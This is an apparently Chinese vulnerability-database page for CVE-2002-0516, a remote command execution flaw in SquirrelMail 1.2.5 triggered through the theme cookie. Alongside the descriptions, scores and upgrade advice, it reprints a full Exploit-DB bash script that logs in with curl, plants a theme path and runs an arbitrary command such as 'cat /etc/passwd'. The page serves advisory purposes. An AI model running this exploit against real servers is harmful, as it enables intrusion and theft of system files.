CVE-2002-0516
CVSS10.0
发布时间 :2002-08-12 00:00:00
修订时间 :2008-09-05 16:28:13
NMCOE    

[原文]SquirrelMail 1.2.5 and earlier allows authenticated SquirrelMail users to execute arbitrary commands by modifying the THEME variable in a cookie.


[CNNVD]SquirrelMail选择主题远程执行任意命令漏洞(CNNVD-200208-174)

        
        SquirrelMail是一个多功能的用PHP4实现的Webmail程序,可运行于Linux/Unix类操作系统下,它允许利用plugin来扩展系统的功能。
        某些版本的SquirrelMail程序对用户输入未做充分过滤,可以使远程攻击者在主机上执行任意命令。
        程序脚本对用户选择主题的变量未做充分过滤,远程攻击者可能通过构造特定的输入可能在主机上以Web服务器进程身份执行任意命令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:squirrelmail:squirrelmail:1.2.0
cpe:/a:squirrelmail:squirrelmail:1.2.1
cpe:/a:squirrelmail:squirrelmail:1.2.2
cpe:/a:squirrelmail:squirrelmail:1.2.4
cpe:/a:squirrelmail:squirrelmail:1.2.5
cpe:/a:squirrelmail:squirrelmail:1.2.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0516
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0516
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-174
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/4385
(VENDOR_ADVISORY)  BID  4385
http://www.iss.net/security_center/static/8671.php
(VENDOR_ADVISORY)  XF  squirrelmail-theme-command-execution(8671)
http://archives.neohapsis.com/archives/bugtraq/2002-03/0386.html
(UNKNOWN)  BUGTRAQ  20020331 Re: squirrelmail 1.2.5 email user can execute command
http://archives.neohapsis.com/archives/bugtraq/2002-03/0350.html
(UNKNOWN)  BUGTRAQ  20020327 squirrelmail 1.2.5 email user can execute command

- 漏洞信息

SquirrelMail选择主题远程执行任意命令漏洞
危急 未知
2002-08-12 00:00:00 2005-05-02 00:00:00
远程  
        
        SquirrelMail是一个多功能的用PHP4实现的Webmail程序,可运行于Linux/Unix类操作系统下,它允许利用plugin来扩展系统的功能。
        某些版本的SquirrelMail程序对用户输入未做充分过滤,可以使远程攻击者在主机上执行任意命令。
        程序脚本对用户选择主题的变量未做充分过滤,远程攻击者可能通过构造特定的输入可能在主机上以Web服务器进程身份执行任意命令。
        

- 公告与补丁

        厂商补丁:
        SquirrelMail
        ------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.squirrelmail.org

- 漏洞信息 (21358)

SquirrelMail 1.2.x Theme Remote Command Execution Vulnerability (EDBID:21358)
php webapps
2002-03-28 Verified
0 pokleyzz sakamaniaka
N/A [点击下载]
source: http://www.securityfocus.com/bid/4385/info

SquirrelMail is a feature rich webmail program implemented in the PHP4 language. It is available for Linux and Unix based operating systems. SquirrelMail allows for extended functionality through a plugin system.

A vulnerability has been reported in some versions of SquirrelMail. Reportedly, it is possible to corrupt the variable used to select a user's theme, and force the vulnerable script to execute arbitrary commands. 

#!/bin/bash
#
# squirrelmail-1.2.5 remote execution by pokleyzz
http://www.inetd-secure.net
#
# usage   : ./sq125x themecount username password
url command
# example : ./sq125x 2 pokley 123456
http://mail.pokleyzz.my/mail "cat /etc/passwd"
#
# curl can be found at http://curl.haxx.se/libcurl/
#

export
PATH="/usr/bin:/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/l
ocal/sbin"
export CURL="/usr/bin/curl"
export USERNAME="$2"
export PASSWORD="$3"
export THEME_COUNT="$1"
export URL="$4"
export COMMAND=`echo $5|sed 's/\ /%20/g' -`
export TMPFILE="header.tmp"
export THEME="theme[${THEME_COUNT}][PATH]
=../data/${USERNAME}.pref; theme
[${THEME_COUNT}][NAME]=testing"

#step 1
sed "s/pokley/"$USERNAME"/g" post.txt >lame.txt
/bin/rm -rf ${TMPFILE}
$CURL -b "$THEME" -d
login_username=${USERNAME} -d
secretkey=${PASSWORD} -d
js_autodetect_results=0 -d just_logged_in=1 -D
${TMPFILE} ${URL}/src/redirect.php
export COOKIES=`cat ${TMPFILE} |grep Set-
Cookie|awk {'print $2'}|while read data;do printf '%b'
$data;done`
export COOKIES="${COOKIES} ${THEME}"
$CURL -b "$COOKIES" -d @lame.txt -o /tmp/.tmp --
silent ${URL}/src/options.php

#step 2
sleep 5s
$CURL -b "$THEME" -d
login_username=${USERNAME} -d
secretkey=${PASSWORD} -d
js_autodetect_results=0 -d just_logged_in=1 -D
${TMPFILE} ${URL}/src/redirect.php
export COOKIES=`cat ${TMPFILE} |grep Set-
Cookie|awk {'print $2'}|while read data;do printf '%b'
$data;done`
export COOKIES="${COOKIES} ${THEME}"
$CURL -b "$COOKIES" -d @lame.txt -o /tmp/.tmp --
silent ${URL}/src/options.php
$CURL -b "$COOKIES" ${URL}/src/left_main.php?
cmdd=${COMMAND}
$CURL -b "$COOKIES" -o /tmp/.tmp --silent
${URL}/src/signout.php
rm -rf lame.txt /tmp/.tmp
		

- 漏洞信息

5272
SquirrelMail Cookie Theme Variable Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2004-04-09 Unknow
2004-04-09 2002-04-29

- 解决方案

Upgrade to version 1.2.6 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站